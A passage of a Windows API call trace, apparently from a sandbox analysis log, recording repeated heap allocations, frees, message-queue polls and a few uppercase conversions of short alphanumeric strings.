(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0265.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.303] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.304] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.305] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.305] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.305] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.306] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.306] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.306] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.306] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.307] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.307] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.308] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.308] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.309] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.309] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.310] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.310] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.310] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.311] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.311] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.312] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.312] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 